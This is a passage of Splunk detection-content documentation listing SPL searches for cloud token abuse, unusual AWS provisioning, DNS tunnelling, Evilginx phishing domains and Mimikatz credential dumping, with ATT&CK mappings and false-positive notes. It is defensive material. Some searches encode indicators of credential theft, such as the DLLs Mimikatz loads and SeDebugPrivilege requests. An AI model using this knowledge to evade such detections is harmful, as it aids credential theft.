`aws_cloudwatchlogs_eks` ASIA userIdentity.type=IAMUser | spath eventName | search eventName=GetSessionToken | table sourceIPAddress eventTime userIdentity.arn userName userAgent user_type status region | `aws_detect_sts_get_session_token_abuse_filter`

Associated Analytic Story


How To Implement

You must install splunk AWS add-on and Splunk App for AWS. This search works with cloudwatch logs

Required field

ATT&CK

ID Technique Tactic
T1550 Use Alternate Authentication Material Defense Evasion, Lateral Movement


Kill Chain Phase

  • Lateral Movement


Known False Positives

Sts:GetSessionToken can be very noisy as in certain environments numerous calls of this type can be executed. This search can be adjusted to provide specific values to identify cases of abuse. In specific environments the use of field requestParameters.serialNumber will need to be used.

Reference

Test Dataset

version: 1


Gcp detect oauth token abuse

This search provides detection of possible GCP Oauth token abuse. GCP Oauth token without time limit can be exfiltrated and reused for keeping access sessions alive without further control of authentication, allowing attackers to access and move laterally.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078
  • Last Updated: 2020-09-01

Search

`google_gcp_pubsub_message` type.googleapis.com/google.cloud.audit.AuditLog |table protoPayload.@type protoPayload.status.details{}.@type protoPayload.status.details{}.violations{}.callerIp protoPayload.status.details{}.violations{}.type protoPayload.status.message | `gcp_detect_oauth_token_abuse_filter`

Associated Analytic Story


How To Implement

You must install splunk GCP add-on. This search works with gcp:pubsub:message logs

Required field

ATT&CK

ID Technique Tactic
T1078 Valid Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Lateral Movement


Known False Positives

GCP Oauth token abuse detection will only work if there are access policies in place along with audit logs.

Reference


Test Dataset

version: 1



Deprecated

Aws cloud provisioning from previously unseen city

This search looks for AWS provisioning activities from previously unseen cities. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search City=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by City | eval newCity=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCity=1 | table City] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, City, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_city_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new city is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your city, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen country

This search looks for AWS provisioning activities from previously unseen countries. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Country | eval newCountry=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newCountry=1 | table Country] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Country, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_country_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching over plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new country is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen ip address

This search looks for AWS provisioning activities from previously unseen IP addresses. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Country=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress | eval newIP=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newIP=1 | table sourceIPAddress] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_ip_address_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new IP address is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your country, there should be few false positives. If you are located in countries where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Aws cloud provisioning from previously unseen region

This search looks for AWS provisioning activities from previously unseen regions. Region in this context is similar to a state in the United States. Provisioning activities are defined broadly as any event that begins with "Run" or "Create." This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1535
  • Last Updated: 2018-03-16

Search

`cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* [search `cloudtrail` (eventName=Run* OR eventName=Create*) | iplocation sourceIPAddress | search Region=* | stats earliest(_time) as firstTime, latest(_time) as lastTime by sourceIPAddress, City, Region, Country | inputlookup append=t previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by sourceIPAddress, City, Region, Country | outputlookup previously_seen_provisioning_activity_src.csv | stats min(firstTime) as firstTime max(lastTime) as lastTime by Region | eval newRegion=if(firstTime >= relative_time(now(), "-70m@m"), 1, 0) | where newRegion=1 | table Region] | spath output=user userIdentity.arn | rename sourceIPAddress as src_ip | table _time, user, src_ip, Region, eventName, errorCode | `aws_cloud_provisioning_from_previously_unseen_region_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. This search works best when you run the "Previously Seen AWS Provisioning Activity Sources" support search once to create a history of previously seen locations that have provisioned AWS resources.

Required field

ATT&CK

ID Technique Tactic
T1535 Unused/Unsupported Cloud Regions Defense Evasion


Kill Chain Phase

Known False Positives

This is a strictly behavioral search, so we define "false positive" slightly differently. Every time this fires, it will accurately reflect the first occurrence in the time period you're searching within, plus what is stored in the cache feature. But while there are really no "false positives" in a traditional sense, there is definitely lots of noise.\

This search will fire any time a new region is seen in the **GeoIP** database for any kind of provisioning activity. If you typically do all provisioning from tools inside of your region, there should be few false positives. If you are located in regions where the free version of **MaxMind GeoIP** that ships by default with Splunk has weak resolution (particularly small countries in less economically powerful regions), this may be much less valuable to you.

Reference

Test Dataset

version: 1


Abnormally high aws instances launched by user

This search looks for CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances errorCode=success | bucket span=10m _time | stats count AS instances_launched by _time userName | eventstats avg(instances_launched) as total_launched_avg, stdev(instances_launched) as total_launched_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_launched > total_launched_avg+(total_launched_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_launched - total_launched_avg) / total_launched_stdev, 2) | table _time, userName, instances_launched, num_standard_deviations_away, total_launched_avg, total_launched_stdev | `abnormally_high_aws_instances_launched_by_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances launched by user - mltk

This search looks for CloudTrail events where a user successfully launches an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=RunInstances errorCode=success `abnormally_high_aws_instances_launched_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_launched by _time src_user | apply ec2_excessive_runinstances_v1 | rename "IsOutlier(instances_launched)" as isOutlier | where isOutlier=1

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances terminated by user

This search looks for CloudTrail events where an abnormally high number of instances were successfully terminated by a user in a 10-minute window. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=TerminateInstances errorCode=success | bucket span=10m _time | stats count AS instances_terminated by _time userName | eventstats avg(instances_terminated) as total_terminations_avg, stdev(instances_terminated) as total_terminations_stdev | eval threshold_value = 4 | eval isOutlier=if(instances_terminated > total_terminations_avg+(total_terminations_stdev * threshold_value), 1, 0) | search isOutlier=1 AND _time >= relative_time(now(), "-10m@m") | eval num_standard_deviations_away = round(abs(instances_terminated - total_terminations_avg) / total_terminations_stdev, 2) |table _time, userName, instances_terminated, num_standard_deviations_away, total_terminations_avg, total_terminations_stdev | `abnormally_high_aws_instances_terminated_by_user_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured with your AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify whether this search alerted on a human user.

Reference

Test Dataset

version: 2


Abnormally high aws instances terminated by user - mltk

This search looks for CloudTrail events where a user successfully terminates an abnormally high number of instances. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` eventName=TerminateInstances errorCode=success `abnormally_high_aws_instances_terminated_by_user___mltk_filter` | bucket span=10m _time | stats count as instances_terminated by _time src_user | apply ec2_excessive_terminateinstances_v1 | rename "IsOutlier(instances_terminated)" as isOutlier | where isOutlier=1

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. The threshold value should be tuned to your environment.

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Many service accounts configured within an AWS infrastructure are known to exhibit this behavior. Please adjust the threshold values and filter out service accounts from the output. Always verify if this search alerted on a human user.

Reference

Test Dataset

version: 2


Clients connecting to multiple dns servers

This search allows you to identify the endpoints that have connected to more than five DNS servers and made DNS Queries over the time frame of the search.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count, values(DNS.dest) AS dest dc(DNS.dest) as dest_count from datamodel=Network_Resolution where DNS.message_type=QUERY by DNS.src | `drop_dm_object_name("Network_Resolution")` |where dest_count > 5 | `clients_connecting_to_multiple_dns_servers_filter`

Associated Analytic Story


How To Implement

This search requires that DNS data is being ingested and populating the `Network_Resolution` data model. This data can come from DNS logs or from solutions that parse network traffic for this data, such as Splunk Stream or Bro.\ This search produces fields (`dest_count`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** Distinct DNS Connections, **Field:** dest_count\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control


Known False Positives

It's possible that an enterprise has more than five DNS servers that are configured in a round-robin rotation. Please customize the search, as appropriate.

Reference

Test Dataset

version: 3


Cloud network access control list deleted

Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the Change datamodel to detect users deleting network ACLs. Deprecated because it's a duplicate

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2020-09-08

Search

`cloudtrail` eventName=DeleteNetworkAcl |rename userIdentity.arn as arn | stats count min(_time) as firstTime max(_time) as lastTime values(errorMessage) values(errorCode) values(userAgent) values(userIdentity.*) by src userName arn eventName | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `cloud_network_access_control_list_deleted_filter`

Associated Analytic Story


How To Implement

You must be ingesting your cloud infrastructure logs from your cloud provider. You can also provide additional filtering for this search by customizing the `cloud_network_access_control_list_deleted_filter` macro.

Required field

Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's possible that a user has legitimately deleted a network ACL.

Reference

Test Dataset

version: 1


Dns query requests resolved by unauthorized dns servers

This search will detect DNS requests resolved by unauthorized DNS servers. Legitimate DNS servers should be identified in the Enterprise Security Assets and Identity Framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1071.004
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count from datamodel=Network_Resolution where DNS.dest_category != dns_server AND DNS.src_category != dns_server by DNS.src DNS.dest | `drop_dm_object_name("DNS")` | `dns_query_requests_resolved_by_unauthorized_dns_servers_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you will need to ensure that DNS data is populating the Network_Resolution data model. It also requires that your DNS servers are identified correctly in the Assets and Identity table of Enterprise Security.

Required field

ATT&CK

ID Technique Tactic
T1071.004 DNS Command and Control


Kill Chain Phase

  • Command and Control


Known False Positives

Legitimate DNS activity can be detected in this search. Investigate, verify and update the list of authorized DNS servers as appropriate.

Reference

Test Dataset

version: 3


Detect api activity from users without mfa

This search looks for CloudTrail events where a user logged into the AWS account, is making API calls and has not enabled Multi Factor authentication. Multi factor authentication adds a layer of security by forcing the users to type a unique authentication code from an approved authentication device when they access AWS websites or services. AWS Best Practices recommend that you enable MFA for privileged IAM users.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK:
  • Last Updated: 2018-05-17

Search

`cloudtrail` userIdentity.sessionContext.attributes.mfaAuthenticated=false | search NOT [ | inputlookup aws_service_accounts | fields identity | rename identity as user] | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by userIdentity.arn userIdentity.type user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_api_activity_from_users_without_mfa_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. Leverage the support search `Create a list of approved AWS service accounts`: run it once every 30 days to create a list of service accounts and validate them.\ This search produces fields (`eventName`,`userIdentity.type`,`userIdentity.arn`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** AWS User ARN, **Field:** userIdentity.arn\ 1. \ 1. **Label:** AWS User Type, **Field:** userIdentity.type\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

Kill Chain Phase

Known False Positives

Many service accounts configured within an AWS infrastructure do not have multi factor authentication enabled. Please ignore the service accounts, if triggered and instead add them to the aws_service_accounts.csv file to fine tune the detection. It is also possible that the search detects users in your environment using Single Sign-On systems, since the MFA is not handled by AWS.

Reference

Test Dataset

version: 1


Detect aws api activities from unapproved accounts

This search looks for successful CloudTrail activity by user accounts that are not listed in the identity table or `aws_service_accounts.csv`. It returns event names and count, as well as the first and last time a specific user or service is detected, grouped by users. Deprecated because managing this list can be quite hard.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

`cloudtrail` errorCode=success | rename userName as identity | search NOT [ | inputlookup identity_lookup_expanded | fields identity] | search NOT [ | inputlookup aws_service_accounts | fields identity] | rename identity as user | stats count min(_time) as firstTime max(_time) as lastTime values(eventName) as eventName by user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_aws_api_activities_from_unapproved_accounts_filter`

Associated Analytic Story


How To Implement

You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your CloudTrail inputs. You must also populate the `identity_lookup_expanded` lookup shipped with the Asset and Identity framework to be able to look up users in your identity table in Enterprise Security (ES). Leverage the support search called "Create a list of approved AWS service accounts": run it once every 30 days to create and validate a list of service accounts.\ This search produces fields (`eventName`,`firstTime`,`lastTime`) that are not yet supported by ES Incident Review and therefore cannot be viewed when a notable event is raised. These fields contribute additional context to the notable. To see the additional metadata, add the following fields, if not already present, to Incident Review - Event Attributes (Configure > Incident Management > Incident Review Settings > Add New Entry):\\n1. **Label:** AWS Event Name, **Field:** eventName\ 1. \ 1. **Label:** First Time, **Field:** firstTime\ 1. \ 1. **Label:** Last Time, **Field:** lastTime\ Detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details`

Required field

ATT&CK

ID Technique Tactic
T1078.004 Cloud Accounts Defense Evasion, Initial Access, Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

It's likely that you'll find activity detected by users/service accounts that are not listed in the `identity_lookup_expanded` or ` aws_service_accounts.csv` file. If the user is a legitimate service account, update the `aws_service_accounts.csv` table with that entry.

Reference

Test Dataset

version: 2


Detect dns requests to phishing sites leveraging evilginx2

This search looks for DNS requests for phishing domains that are leveraging EvilGinx tools to mimic websites.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1566.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(DNS.answer) as answer from datamodel=Network_Resolution.DNS by DNS.dest DNS.src DNS.query host | `drop_dm_object_name(DNS)` | rex field=query ".*?(?<domain>[^./:]+\.(\S{2,3} |\S{2,3}.\S{2,3}))$" | stats count values(query) as query by domain dest src answer | search `evilginx_phishlets_amazon` OR `evilginx_phishlets_facebook` OR `evilginx_phishlets_github` OR `evilginx_phishlets_0365` OR `evilginx_phishlets_outlook` OR `evilginx_phishlets_aws` OR `evilginx_phishlets_google` | search NOT [ inputlookup legit_domains.csv | fields domain] | join domain type=outer [ | tstats count `security_content_summariesonly` values(Web.url) as url from datamodel=Web.Web by Web.dest Web.site | rename "Web.*" as * | rex field=site ".*?(?<domain>[^./:]+\.(\S{2,3} |\S{2,3}.\S{2,3}))$" | table dest domain url] | table count src dest query answer domain url | `detect_dns_requests_to_phishing_sites_leveraging_evilginx2_filter`

Associated Analytic Story


How To Implement

You need to ingest data from your DNS logs in the Network_Resolution datamodel. Specifically you must ingest the domain that is being queried and the IP of the host originating the request. Ideally, you should also be ingesting the answer to the query and the query type. This approach allows you to also create your own localized passive DNS capability which can aid you in future investigations. You will have to add legitimate domain names to the `legit_domains.csv` file shipped with the app. \

**Splunk>Phantom Playbook Integration**\

If Splunk>Phantom is also configured in your environment, a Playbook called `Lets Encrypt Domain Investigate` can be configured to run when any results are found by this detection search. To use this integration, install the Phantom App for Splunk `https://splunkbase.splunk.com/app/3411/`, add the correct hostname to the "Phantom Instance" field in the Adaptive Response Actions when configuring this detection search, and set the corresponding Playbook to active. \ (Playbook link:`https://my.phantom.us/4.2/playbook/lets-encrypt-domain-investigate/`).\


Required field

ATT&CK

ID Technique Tactic
T1566.003 Spearphishing via Service Initial Access


Kill Chain Phase

  • Delivery
  • Command and Control


Known False Positives

If a known good domain is not listed in the legit_domains.csv file, then the search could give you false postives. Please update that lookup file to filter out DNS requests to legitimate domains.

Reference

Test Dataset

version: 2


Detect long dns txt record response

This search is used to detect attempts to use DNS tunneling, by calculating the length of responses to DNS TXT queries. Endpoints using DNS as a method of transmission for data exfiltration, command and control, or evasion of security controls can often be detected by noting unusually large volumes of DNS traffic. Deprecated because this detection should focus on DNS queries instead of DNS responses.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Network_Resolution
  • ATT&CK: T1048.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Resolution where DNS.message_type=response AND DNS.record_type=TXT by DNS.src DNS.dest DNS.answer DNS.record_type | `drop_dm_object_name("DNS")` | eval anslen=len(answer) | search anslen>100 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | rename src as "Source IP", dest as "Destination IP", answer as "DNS Answer" anslen as "Answer Length" record_type as "DNS Record Type" firstTime as "First Time" lastTime as "Last Time" count as Count | table "Source IP" "Destination IP" "DNS Answer" "DNS Record Type" "Answer Length" Count "First Time" "Last Time" | `detect_long_dns_txt_record_response_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to ingest data from your DNS logs, or monitor DNS traffic using Stream, Bro or something similar. Specifically, this query requires that the DNS data model is populated with information regarding the DNS record type that is being returned as well as the data in the answer section of the protocol.

Required field

ATT&CK

ID Technique Tactic
T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Exfiltration


Kill Chain Phase

  • Command and Control


Known False Positives

It's possible that legitimate TXT record responses can be long enough to trigger this search. You can modify the packet threshold for this search to help mitigate false positives.

Reference

Test Dataset

version: 2


Detect mimikatz using loaded images

This search looks for reading loaded Images unique to credential dumping with Mimikatz. Deprecated because mimikatz libraries changed and very noisy sysmon Event Code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-12-03

Search

`sysmon` EventCode=7 | stats values(ImageLoaded) as ImageLoaded values(ProcessId) as ProcessId by Computer, Image | search ImageLoaded=*WinSCard.dll ImageLoaded=*cryptdll.dll ImageLoaded=*hid.dll ImageLoaded=*samlib.dll ImageLoaded=*vaultcli.dll | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_using_loaded_images_filter`

Associated Analytic Story


How To Implement

This search needs Sysmon Logs and a sysmon configuration, which includes EventCode 7 with powershell.exe. This search uses an input macro named `sysmon`. We strongly recommend that you specify your environment-specific configurations (index, source, sourcetype, etc.) for Windows Sysmon logs. Replace the macro definition with configurations for your Splunk environment. The search also uses a post-filter macro designed to filter out known false positives.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Other tools can import the same DLLs. These tools should be part of a whitelist.

Reference


Test Dataset

version: 1


Detect mimikatz via powershell and eventcode 4703

This search looks for PowerShell requesting privileges consistent with credential dumping. Deprecated, looks like things changed from a logging perspective.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2019-02-27

Search

`wineventlog_security` signature_id=4703 Process_Name=*powershell.exe | rex field=Message "Enabled Privileges:\s+(?<privs>\w+)\s+Disabled Privileges:" | where privs="SeDebugPrivilege" | stats count min(_time) as firstTime max(_time) as lastTime by dest, Process_Name, privs, Process_ID, Message | rename privs as "Enabled Privilege" | rename Process_Name as process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mimikatz_via_powershell_and_eventcode_4703_filter`

Associated Analytic Story


How To Implement

You must be ingesting Windows Security logs. You must also enable the account change auditing here: http://docs.splunk.com/Documentation/Splunk/7.0.2/Data/MonitorWindowseventlogdata. Additionally, this search requires you to enable your Group Management Audit Logs in your Local Windows Security Policy and to be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/. Finally, please make sure that the local administrator group name is "Administrators" to be able to look for the right group membership changes.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The activity may be legitimate. PowerShell is often used by administrators to perform various tasks, and it's possible this event could be generated in those cases. In these cases, false positives should be fairly obvious and you may need to tweak the search to eliminate noise.

Reference

Test Dataset

version: 2


Detect spike in aws api activity

This search will detect users creating spikes of API activity in your AWS environment. It will also update the cache file that factors in the latest data. This search is deprecated and have been translated to use the latest Change Datamodel.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1078.004
  • Last Updated: 2020-07-21

Search

